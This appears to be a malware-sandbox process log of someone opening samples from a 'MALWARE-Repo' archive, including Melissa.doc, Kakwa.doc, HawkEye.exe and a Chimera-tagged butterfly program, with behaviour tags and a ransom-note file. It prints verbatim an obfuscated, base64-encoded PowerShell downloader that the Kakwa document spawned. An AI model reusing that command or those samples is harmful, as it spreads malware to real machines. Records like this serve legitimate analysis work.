C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4140 /prefetch:82⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6064 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:12⤵PID:4168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:12⤵PID:4644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2648 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2356 /prefetch:82⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:12⤵PID:3480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:12⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:12⤵PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2744 /prefetch:12⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5968 /prefetch:82⤵PID:1072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:12⤵PID:1124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:12⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵PID:4244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:12⤵PID:520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,241237471753280816,3577529835992422707,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:12⤵PID:1452
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:116
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4308
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3840
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask1⤵PID:2924
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\" -ad -an -ai#7zMap14023:108:7zEvent302741⤵
- Suspicious use of AdjustPrivilegeToken
PID:3400
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Virus\Melissa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:772
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:2848
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Trojan\BonziKill.txt1⤵PID:2780
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\Kakwa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:648 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C p^ow^Ers^HE^lL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==2⤵
- Process spawned unexpected child process
PID:3204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErsHElL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEARwA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 648 -s 44362⤵
- Process spawned unexpected child process
- Program crash
PID:2160
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 648 -ip 6481⤵PID:1256
-
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"1⤵
- Executes dropped EXE
PID:4036 -
C:\Users\Admin\AppData\Local\Temp\is-29H8C.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-29H8C.tmp\butterflyondesktop.tmp" /SL5="$C04AC,2719719,54272,C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4592 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"3⤵
- Chimera
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:4188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe56dd46f8,0x7ffe56dd4708,0x7ffe56dd47184⤵PID:244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:24⤵PID:2988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:84⤵PID:3484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:34⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:14⤵PID:3344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:14⤵PID:2204
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:14⤵PID:624
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4052
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:736
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt1⤵PID:3032
-
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4744
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\YOUR_FILES_ARE_ENCRYPTED.HTML1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4600 -
